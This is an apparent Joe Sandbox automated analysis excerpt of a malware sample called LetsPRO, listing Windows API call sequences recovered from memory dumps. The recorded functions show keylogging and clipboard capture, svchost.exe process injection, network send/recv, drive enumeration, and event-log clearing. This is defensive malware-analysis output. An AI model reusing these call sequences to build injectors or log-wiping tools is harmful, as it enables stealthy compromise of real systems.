                                          • Part of subcall function 03F43DE2: GetLastError.KERNEL32(00000001,00000000,03F3F920,03F3F6FC,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F43DE6
                                          • Part of subcall function 03F43DE2: ___set_flsgetvalue.LIBCMT ref: 03F43DF4
                                          • Part of subcall function 03F43DE2: __calloc_crt.LIBCMT ref: 03F43E08
                                          • Part of subcall function 03F43DE2: DecodePointer.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43E22
                                          • Part of subcall function 03F43DE2: GetCurrentThreadId.KERNEL32 ref: 03F43E38
                                          • Part of subcall function 03F43DE2: SetLastError.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43E50
                                        • __freeptd.LIBCMT ref: 03F3F973
                                          • Part of subcall function 03F43FA6: TlsGetValue.KERNEL32(?,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FC7
                                          • Part of subcall function 03F43FA6: TlsGetValue.KERNEL32(?,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FD9
                                          • Part of subcall function 03F43FA6: DecodePointer.KERNEL32(00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43FEF
                                          • Part of subcall function 03F43FA6: __freefls@4.LIBCMT ref: 03F43FFA
                                          • Part of subcall function 03F43FA6: TlsSetValue.KERNEL32(00000018,00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F4400C
                                        • ExitThread.KERNEL32 ref: 03F3F97C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 4224061863-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time_memmovetime
                                        • String ID:
                                        • API String ID: 1463837790-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 025F3013
                                        • recv.WS2_32(?,?,00040000,00000000), ref: 025F3034
                                          • Part of subcall function 025F71ED: __getptd_noexit.LIBCMT ref: 025F71ED
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexitrecvselect
                                        • String ID:
                                        • API String ID: 4248608111-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03F33043
                                        • recv.WS2_32(?,?,00040000,00000000), ref: 03F33064
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexitrecvselect
                                        • String ID:
                                        • API String ID: 4248608111-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • send.WS2_32(?,?,00040000,00000000), ref: 025F3261
                                        • send.WS2_32(?,?,?,00000000), ref: 025F329E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • send.WS2_32(?,?,00040000,00000000), ref: 03F33291
                                        • send.WS2_32(?,?,?,00000000), ref: 03F332CE
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • HeapCreate.KERNEL32(00000004,00000000,00000000,025F6190,00000000,025F5AF2), ref: 025F64FB
                                        • _free.LIBCMT ref: 025F6536
                                          • Part of subcall function 025F1280: __CxxThrowException@8.LIBCMT ref: 025F1290
                                          • Part of subcall function 025F1280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 025F12A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                        • String ID:
                                        • API String ID: 1116298128-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • HeapCreate.KERNEL32(00000004,00000000,00000000,03F3E04E,00000000,03F39800,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F3CD1B
                                        • _free.LIBCMT ref: 03F3CD56
                                          • Part of subcall function 03F31280: __CxxThrowException@8.LIBCMT ref: 03F31290
                                          • Part of subcall function 03F31280: DeleteCriticalSection.KERNEL32(00000000,03F3D3E6,03F56624,?,?,03F3D3E6,?,?,?,?,03F55A40,00000000), ref: 03F312A1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                        • String ID:
                                        • API String ID: 1116298128-0
                                        • Opcode ID: 0a3e60dc5a43c5f3b754e0216a937d92d52389828af2879065d189595f275b37
                                        • Instruction ID: b4b87f5c5ad9c4806be2a6987d2f641c3d9d99c43f886fd22785383957ee30ef
                                        • Opcode Fuzzy Hash: 0a3e60dc5a43c5f3b754e0216a937d92d52389828af2879065d189595f275b37
                                        • Instruction Fuzzy Hash: BD017AB0A00B459FD730DF6A9884A17FAE8BF99700B504A1EE2DAC6A20D370A105CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 00401DEE
                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 00401E00
                                          • Part of subcall function 00401BD0: GetModuleHandleA.KERNEL32(?), ref: 00401BDA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FreeHandleHeapModuleRead
                                        • String ID:
                                        • API String ID: 627478288-0
                                        • Opcode ID: ab871cd8e4baabd87cd8aa4c49eb0f992674a710188b76f39192ade9d00fd0b1
                                        • Instruction ID: 47e6e89657e11cf4bcb87a072d3143b0d1d83859a22f73af97cbbb24c1c97c3f
                                        • Opcode Fuzzy Hash: ab871cd8e4baabd87cd8aa4c49eb0f992674a710188b76f39192ade9d00fd0b1
                                        • Instruction Fuzzy Hash: 69E0E531A00111ABD631AF15EE4469F76AC9B05746B010037F954B76B0D334BD8097DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateThread.KERNEL32(00000000,00000000,03F3DF10,00000000,00000000,00000000), ref: 03F3E49B
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03F41168,?,?,?,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F3E4A9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 1891408510-0
                                        • Opcode ID: c34b1b27b5ada4d43dd94fda12aba36420e1fa95d13b004553ea9d210db29043
                                        • Instruction ID: edfd7880cd26bae77436d80d53d2cf41166cb8f1e01d69c5d2cf5da89a85bba9
                                        • Opcode Fuzzy Hash: c34b1b27b5ada4d43dd94fda12aba36420e1fa95d13b004553ea9d210db29043
                                        • Instruction Fuzzy Hash: 1CE012B554430EBFEB10EA64EC95E36339CDB19330B204615FA21D2248D63198508660
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 03F3F98F
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                          • Part of subcall function 03F3F964: __getptd_noexit.LIBCMT ref: 03F3F969
                                          • Part of subcall function 03F3F964: __freeptd.LIBCMT ref: 03F3F973
                                          • Part of subcall function 03F3F964: ExitThread.KERNEL32 ref: 03F3F97C
                                        • __XcptFilter.LIBCMT ref: 03F3F9B0
                                          • Part of subcall function 03F4418F: __getptd_noexit.LIBCMT ref: 03F44195
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                        • String ID:
                                        • API String ID: 418257734-0
                                        • Opcode ID: decfe75406151112e6d1aad87c9590d91e596757d6b042d3daa6160426949c54
                                        • Instruction ID: f5ab95a440c046c7c0858c76043ddc277f183b76228ee05a633d1c3418c7d196
                                        • Opcode Fuzzy Hash: decfe75406151112e6d1aad87c9590d91e596757d6b042d3daa6160426949c54
                                        • Instruction Fuzzy Hash: A1E0ECB9901700EFEB18EBA1DC05F7D7B75AF45A11F200189E1016F2A1CB799940DA20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __lock.LIBCMT ref: 03F4641B
                                          • Part of subcall function 03F48E5B: __mtinitlocknum.LIBCMT ref: 03F48E71
                                          • Part of subcall function 03F48E5B: __amsg_exit.LIBCMT ref: 03F48E7D
                                          • Part of subcall function 03F48E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03F43F06,0000000D,03F56340,00000008,03F43FFF,00000000,?,03F410F0,00000000,03F56278,00000008,03F41155,?), ref: 03F48E85
                                        • __tzset_nolock.LIBCMT ref: 03F4642C
                                          • Part of subcall function 03F45D22: __lock.LIBCMT ref: 03F45D44
                                          • Part of subcall function 03F45D22: ____lc_codepage_func.LIBCMT ref: 03F45D8B
                                          • Part of subcall function 03F45D22: __getenv_helper_nolock.LIBCMT ref: 03F45DAD
                                          • Part of subcall function 03F45D22: _free.LIBCMT ref: 03F45DE4
                                          • Part of subcall function 03F45D22: _strlen.LIBCMT ref: 03F45DEB
                                          • Part of subcall function 03F45D22: __malloc_crt.LIBCMT ref: 03F45DF2
                                          • Part of subcall function 03F45D22: _strlen.LIBCMT ref: 03F45E08
                                          • Part of subcall function 03F45D22: _strcpy_s.LIBCMT ref: 03F45E16
                                          • Part of subcall function 03F45D22: __invoke_watson.LIBCMT ref: 03F45E2B
                                          • Part of subcall function 03F45D22: _free.LIBCMT ref: 03F45E3A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                        • String ID:
                                        • API String ID: 1828324828-0
                                        • Opcode ID: b0e2a48e8cbe58c101d8935f958670d7c6a4d6441ee648888c43efe715c5ef1f
                                        • Instruction ID: c22e1d1ff5f7eaf66708fac033a6924cd0f2d12ba2c8c91d8b951c3132213378
                                        • Opcode Fuzzy Hash: b0e2a48e8cbe58c101d8935f958670d7c6a4d6441ee648888c43efe715c5ef1f
                                        • Instruction Fuzzy Hash: 66E0C238C45316D7CA22FBE0B922A1C7A306B91F21FA00169F060A9098CEB10181EA53
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 08f3cb027e5e836f165beec56cfdc055c7157135e271e5d9a7bdb5dfb1414ad7
                                        • Instruction ID: 369afb116dce29ddf802fdad9d560ea3fc7219c16aa5b7e50199afa717a6020b
                                        • Opcode Fuzzy Hash: 08f3cb027e5e836f165beec56cfdc055c7157135e271e5d9a7bdb5dfb1414ad7
                                        • Instruction Fuzzy Hash: A09168B16053028FCB28CF19C580A2AF7E1FF84314F15896EE885AB3A1D774E945CF86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F3E8A9
                                        • Sleep.KERNEL32(00000001,?,?,?,03F3604D), ref: 03F3E8B3
                                        • GetTickCount.KERNEL32 ref: 03F3E8BF
                                        • GetTickCount.KERNEL32 ref: 03F3E8D2
                                        • InterlockedExchange.KERNEL32(03F61F08,00000000), ref: 03F3E8DA
                                        • OpenClipboard.USER32(00000000), ref: 03F3E8E2
                                        • GetClipboardData.USER32(0000000D), ref: 03F3E8EA
                                        • GlobalSize.KERNEL32(00000000), ref: 03F3E8FB
                                        • GlobalLock.KERNEL32(00000000), ref: 03F3E90C
                                        • wsprintfW.USER32 ref: 03F3E985
                                        • _memset.LIBCMT ref: 03F3E9A3
                                        • GlobalUnlock.KERNEL32(00000000), ref: 03F3E9AC
                                        • CloseClipboard.USER32 ref: 03F3E9B2
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 03F3E9CA
                                        • CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03F3E9E4
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3EA02
                                        • lstrlenW.KERNEL32(03F55B48,?,00000000), ref: 03F3EA16
                                        • WriteFile.KERNEL32(00000000,03F55B48,00000000), ref: 03F3EA25
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3EA2C
                                        • ReleaseMutex.KERNEL32(00000000), ref: 03F3EA38
                                        • GetKeyState.USER32(00000014), ref: 03F3EABC
                                        • lstrlenW.KERNEL32(03F5B4A8), ref: 03F3EB0B
                                        • wsprintfW.USER32 ref: 03F3EB1D
                                        • lstrlenW.KERNEL32(03F5B4D0), ref: 03F3EB3E
                                        • lstrlenW.KERNEL32(03F5B4D0), ref: 03F3EB61
                                        • wsprintfW.USER32 ref: 03F3EB7F
                                        • wsprintfW.USER32 ref: 03F3EB95
                                        • wsprintfW.USER32 ref: 03F3EBBF
                                        • lstrlenW.KERNEL32(00000000), ref: 03F3EC0B
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 03F3EC21
                                        • CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03F3EC3B
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3EC59
                                        • lstrlenW.KERNEL32(00000000,?,00000000), ref: 03F3EC69
                                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 03F3EC74
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3EC7B
                                        • ReleaseMutex.KERNEL32(00000000), ref: 03F3EC88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                        • String ID: [$%s%s$%s%s$%s%s$[esc]
                                        • API String ID: 1637302245-2373594894
                                        • Opcode ID: c4afdc38111ef2365ae85505c29cdcfee827983e2a5948325fe3ec0d61d921a5
                                        • Instruction ID: 1c8a4095fcfce76466d5d271a8a12508a81db5f011ee218e50f08378219e5397
                                        • Opcode Fuzzy Hash: c4afdc38111ef2365ae85505c29cdcfee827983e2a5948325fe3ec0d61d921a5
                                        • Instruction Fuzzy Hash: 34C1D17690130ABFD730EF64DC58FAA7BB8BF19700F044A58F65AD6284D7709584CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F37804
                                        • _memset.LIBCMT ref: 03F37850
                                        • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03F37864
                                          • Part of subcall function 03F38720: _vswprintf_s.LIBCMT ref: 03F38731
                                        • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37893
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 03F378DA
                                          • Part of subcall function 03F37740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03F378FC), ref: 03F37756
                                          • Part of subcall function 03F37740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03F378FC,?,?,?,?,?,?,75920630), ref: 03F3775D
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3790A
                                        • _memset.LIBCMT ref: 03F37923
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3793B
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37944
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37956
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37959
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3796B
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F3796E
                                        • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37980
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37983
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F3798B
                                        • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75920630,?,75920F00), ref: 03F37992
                                        • _memset.LIBCMT ref: 03F379B4
                                        • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F379CA
                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 03F379FF
                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03F37A1B
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03F37A43
                                        • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03F37A58
                                        • WriteProcessMemory.KERNEL32(00000000,00000000,03F376F0,00001000,00000000), ref: 03F37A72
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03F37A90
                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03F37AA1
                                        • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F37ABA
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03F37AD6
                                        • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03F37AE8
                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75920630), ref: 03F37AF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                        • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                        • API String ID: 4176418925-3213446972
                                        • Opcode ID: d396e2f7636fbf457dcb95eb4713c130ec713c990fb1da993334bc95b797c760
                                        • Instruction ID: 76a69824fb79d1dc3e5ccad4be77375607968fd2beec9049769fbfd57ddc0212
                                        • Opcode Fuzzy Hash: d396e2f7636fbf457dcb95eb4713c130ec713c990fb1da993334bc95b797c760
                                        • Instruction Fuzzy Hash: F481A4B1A403587BE721EB659C49FDF777CEF96B00F000598F70DA6181DAB0AA85CE64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A773E0,00000AD4,00000000), ref: 03F38132
                                        • lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                        • lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                        • lstrlenW.KERNEL32(?), ref: 03F381B7
                                        • __wcsnicmp.LIBCMT ref: 03F381CE
                                        • lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        • lstrcpyW.KERNEL32(?,?), ref: 03F38228
                                        • lstrcatW.KERNEL32(?,00000000), ref: 03F38233
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                        • String ID: A:\$B:\
                                        • API String ID: 950920757-1009255891
                                        • Opcode ID: ce7344df1d35dd672aaa187b4179ddfc651d3190fe396a55dd2d36f570e3f3b9
                                        • Instruction ID: decdb7527fb040c36d14d7b0ef75c4886afe232afc262d93e486932f40ed4ed8
                                        • Opcode Fuzzy Hash: ce7344df1d35dd672aaa187b4179ddfc651d3190fe396a55dd2d36f570e3f3b9
                                        • Instruction Fuzzy Hash: 2F41A771E0131DEBDB20EF64DD94AEEB378EF45700F044599EA0AA7144E774DA09CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 03F37B89
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 03F37B90
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03F37BB6
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03F37BCC
                                        • GetLastError.KERNEL32 ref: 03F37BD2
                                        • CloseHandle.KERNEL32(?), ref: 03F37BE0
                                        • CloseHandle.KERNEL32(?), ref: 03F37BFB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3435690185-3733053543
                                        • Opcode ID: 6d6792df91157d6d0730af91b635575a38fce906304571c5ef3846075b2da70b
                                        • Instruction ID: 25443a10c22a630b43d00f986b1e70c0c4c7344603c648d95b4b63d9d0ccffb1
                                        • Opcode Fuzzy Hash: 6d6792df91157d6d0730af91b635575a38fce906304571c5ef3846075b2da70b
                                        • Instruction Fuzzy Hash: 61119472A4030DABDB10EFA4DC59FAE7B78EB08700F404A59FA05EB284CB719905C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • OpenEventLogW.ADVAPI32(00000000,03F558BC), ref: 03F3B3E7
                                        • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 03F3B3F2
                                        • CloseEventLog.ADVAPI32(00000000), ref: 03F3B3F9
                                        Strings
                                        Memory Dump Source
